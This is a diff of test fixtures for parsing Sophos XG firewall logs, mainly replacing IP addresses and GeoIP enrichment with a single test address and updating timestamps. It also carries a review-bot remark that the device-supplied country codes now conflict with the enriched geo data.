@@ -2206,12 +2253,12 @@ }, "client": { "port": 57579, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566178500Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57579 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", + "ingested": "2021-12-09T13:44:55.715046500Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57579 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", "code": "086504418010", "kind": "alert", "action": "drop", 
@@ -2230,36 +2277,52 @@ { "server": { "port": 80, - "ip": "13.226.155.22" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "13.226.155.22" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 57540, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "url": { "original": "http://sophostest.com/callhome/index.html" @@ -2285,8 +2348,7 @@ "defaulttest.local" ], "ip": [ - "172.16.34.24", - "13.226.155.22" + "175.16.199.1" ] }, "sophos": { 
@@ -2307,12 +2369,12 @@ }, "client": { "port": 57540, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566186100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57540 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", + "ingested": "2021-12-09T13:44:55.715052600Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57540 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", "code": "086504418010", "kind": "alert", "action": "drop", 
@@ -2331,36 +2393,38 @@ { "server": { "port": 0, - "ip": "82.211.30.202" + "ip": "175.16.199.1" }, "log": { "level": "notification" }, "destination": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 31400, + "number": 4837, "organization": { - "name": "Accelerated IT Services \u0026 Consulting GmbH" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, - "ip": "82.211.30.202" + "ip": "175.16.199.1" }, "source": { "port": 0, "ip": "10.198.32.89" }, "url": { - "original": "82.211.30.202" + "original": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -2384,7 +2448,7 @@ ], "ip": [ "10.198.32.89", - "82.211.30.202" + "175.16.199.1" ] }, "sophos": { 
@@ -2409,8 +2473,8 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566193700Z", - "original": "device=\"SFW\" date=2018-06-05 time=08:49:00 timezone=\"BST\" device_name=\"XG310\" device_id=C30006T22TGR89B log_id=086320518009 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Alert\" priority=Notice user_name=\"\" protocol=\"ICMP\" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=82.211.30.202 url=82.211.30.202 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", + "ingested": "2021-12-09T13:44:55.715058500Z", + "original": "device=\"SFW\" date=2018-06-05 time=08:49:00 timezone=\"BST\" device_name=\"XG310\" device_id=C30006T22TGR89B log_id=086320518009 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Alert\" priority=Notice user_name=\"\" protocol=\"ICMP\" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", "code": "086320518009", "kind": "alert", "action": "alert", @@ -2429,7 +2493,7 @@ { "server": { "port": 443, - "ip": "182.79.221.19" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -2437,21 +2501,23 @@ "destination": { "geo": { "continent_name": "Asia", - "country_name": "India", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 77.0, - "lat": 20.0 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "IN" + "country_iso_code": "CN" }, "as": { - "number": 9498, + "number": 4837, "organization": { - "name": "BHARTI Airtel Ltd." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "182.79.221.19" + "ip": "175.16.199.1" }, "source": { "port": 9444, 
@@ -2492,7 +2558,7 @@ ], "ip": [ "10.198.47.71", - "182.79.221.19" + "175.16.199.1" ] }, "sophos": { @@ -2519,8 +2585,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566201600Z", - "original": "device=\"SFW\" date=2017-01-31 time=14:03:33 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"jsmith\" user_gp=\"Open Group\" iap=1 category=\"Entertainment\" category_type=\"Unproductive\" url=\"https://r8---sn-ci5gup-qxas.googlevideo.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=10.198.47.71 dst_ip=182.79.221.19 protocol=\"TCP\" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname=\"\" reason=\"\"", + "ingested": "2021-12-09T13:44:55.715064900Z", + "original": "device=\"SFW\" date=2017-01-31 time=14:03:33 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"jsmith\" user_gp=\"Open Group\" iap=1 category=\"Entertainment\" category_type=\"Unproductive\" url=\"https://r8---sn-ci5gup-qxas.googlevideo.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=10.198.47.71 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname=\"\" reason=\"\"", "code": "050901616001", "kind": "event", "action": "allowed", 
@@ -2537,51 +2603,52 @@ { "server": { "port": 80, - "ip": "216.58.197.44" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.0748, - "lat": 37.4043 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "216.58.197.44" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 6805, + "number": 4837, "organization": { - "name": "Telefonica Germany" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 46719, - "ip": "5.5.5.15" + "ip": "175.16.199.1" }, "url": { "domain": "hanuman.com", @@ -2608,8 +2675,7 @@ "defaulttest.local" ], "ip": [ - "5.5.5.15", - "216.58.197.44" + "175.16.199.1" ] }, "sophos": { 
@@ -2632,12 +2698,12 @@ }, "client": { "port": 46719, - "ip": "5.5.5.15" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566225600Z", - "original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion \u0026 Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"", + "ingested": "2021-12-09T13:44:55.715073600Z", + "original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion \u0026 Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"", "code": "050902616002", "kind": "alert", "action": "denied", 
@@ -2656,48 +2722,52 @@ { "server": { "port": 5228, - "ip": "74.125.130.188" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 5228, - "ip": "74.125.130.188" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 6805, + "number": 4837, "organization": { - "name": "Telefonica Germany" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 49128, - "ip": "5.5.5.15" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -2720,8 +2790,7 @@ "defaulttest.local" ], "ip": [ - "5.5.5.15", - "74.125.130.188" + "175.16.199.1" ] }, "sophos": { 
@@ -2750,12 +2819,12 @@ }, "client": { "port": 49128, - "ip": "5.5.5.15" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566249600Z", - "original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"", + "ingested": "2021-12-09T13:44:55.715134Z", + "original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"", "code": "054402617051", "kind": "alert", "action": "denied", 
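Review bot: In `event.original` the device-supplied `src_country_code=DEU dst_country_code=USA` now sits next to enrichment that resolves both endpoints to `CN` / `CN-JL`, so the fixture carries contradictory country evidence for the same event. If the pipeline is meant to prefer GeoIP over the device codes this is harmless but worth a one-line comment in the test input; if it ever maps those codes into `source.geo`/`destination.geo`, the expectation will silently pin the wrong precedence, so it is worth confirming which one applies.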
@@ -2774,36 +2843,52 @@ { "server": { "port": 443, - "ip": "13.79.168.201" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "IE-L", - "city_name": "Dublin", - "country_iso_code": "IE", - "country_name": "Ireland", - "region_name": "Leinster", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -6.2488, - "lat": 53.3338 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "13.79.168.201" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 62851, - "ip": "172.17.34.10" + "ip": "175.16.199.1" }, "url": { "domain": "his-eur1-neur1.servicebus.windows.net", @@ -2830,8 +2915,7 @@ "testhost.local" ], "ip": [ - "172.17.34.10", - "13.79.168.201" + "175.16.199.1" ] }, "sophos": { @@ -2857,7 +2941,7 @@ }, "client": { "port": 62851, - "ip": "172.17.34.10" + "ip": "175.16.199.1" }, "http": { "response": { 
@@ -2866,8 +2950,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566253Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=172.17.34.10 dst_ip=13.79.168.201 protocol=\"TCP\" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"400\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=80042000 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", + "ingested": "2021-12-09T13:44:55.715140500Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"400\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=80042000 
application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050901616001", "kind": "event", "action": "allowed", @@ -2884,40 +2968,56 @@ { "server": { "port": 443, - "ip": "40.90.137.127" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -78.1539, - "lat": 38.7095 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "40.90.137.127" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 60471, - "ip": "172.16.34.15" + "ip": "175.16.199.1" }, "url": { - "domain": "40.90.137.127", - "full": "https://40.90.137.127/" + "domain": "175.16.199.1", + "full": "https://175.16.199.1/" }, "tags": [ "preserve_original_event" @@ -2940,8 +3040,7 @@ "defaulttest.local" ], "ip": [ - "172.16.34.15", - "40.90.137.127" + "175.16.199.1" ] }, "sophos": { @@ -2967,7 +3066,7 @@ }, "client": { "port": 60471, - "ip": "172.16.34.15" + "ip": "175.16.199.1" }, "http": { "response": { 
@@ -2976,8 +3075,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566258100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:52 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=51 user_name=\"\" user_gp=\"\" iap=2 category=\"IPAddress\" category_type=\"Acceptable\" url=\"https://40.90.137.127/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=172.16.34.15 dst_ip=40.90.137.127 protocol=\"TCP\" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=40.90.137.127 exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"200\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=642960832 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", + "ingested": "2021-12-09T13:44:55.715146600Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:52 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=51 user_name=\"\" user_gp=\"\" iap=2 category=\"IPAddress\" category_type=\"Acceptable\" url=\"https://175.16.199.1/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=175.16.199.1 exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"200\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=642960832 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050902616002", "kind": "alert", "action": "denied", 
@@ -2996,36 +3095,52 @@ { "server": { "port": 80, - "ip": "91.228.167.133" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "SK-BL", - "city_name": "Bratislava", - "country_iso_code": "SK", - "country_name": "Slovakia", - "region_name": "Bratislava", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 17.1078, - "lat": 48.15 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 50881, + "number": 4837, "organization": { - "name": "ESET, spol. s r.o." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "91.228.167.133" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 65391, - "ip": "172.17.34.15" + "ip": "175.16.199.1" }, "url": { "domain": "update.eset.com", @@ -3052,8 +3167,7 @@ "testhost.local" ], "ip": [ - "172.17.34.15", - "91.228.167.133" + "175.16.199.1" ] }, "sophos": { @@ -3080,7 +3194,7 @@ }, "client": { "port": 65391, - "ip": "172.17.34.15" + "ip": "175.16.199.1" }, "http": { "response": { 
@@ -3089,8 +3203,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566263300Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname=\"\" reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", + "ingested": "2021-12-09T13:44:55.715152500Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com 
exceptions=av,https,sandstorm activityname=\"\" reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050901616001", "kind": "event", "action": "allowed", @@ -3164,7 +3278,7 @@ }, "event": { "severity": 1, - "ingested": "2021-06-30T11:19:55.566269500Z", + "ingested": "2021-12-09T13:44:55.715158400Z", "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SF01V\" device_id=1234567890123456 log_id=058420116010 log_type=\"Content Filtering\" log_component=\"Web Content Policy\" log_subtype=\"Alert\" user=\"gi123456\" src_ip=10.108.108.49 transaction_id=\"e4a127f7-a850-477c-920e-a471b38727c1\" dictionary_name=\"complicated_Custom\" site_category=Information Technology website=\"ta-web-static-testing.qa. astaro.de\" direction=\"in\" action=\"Deny\" file_name=\"cgi_echo.pl\" context_match=\"Not\" context_prefix=\"blah blah hello \" context_suffix=\" hello blah \"", "code": "058420116010", "kind": "event", 
@@ -3178,29 +3292,31 @@ { "server": { "port": 80, - "ip": "64.233.189.147" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "64.233.189.147" + "ip": "175.16.199.1" }, "source": { "port": 37832, @@ -3241,7 +3357,7 @@ ], "ip": [ "192.168.73.220", - "64.233.189.147" + "175.16.199.1" ] }, "sophos": { 
@@ -3269,8 +3385,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566273300Z", - "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050927616005 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Warned\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=64.233.189.147 protocol=\"TCP\" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=\" Search\" reason=\"\"", + "ingested": "2021-12-09T13:44:55.715164400Z", + "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050927616005 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Warned\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=\" Search\" reason=\"\"", "code": "050927616005", "kind": "event", 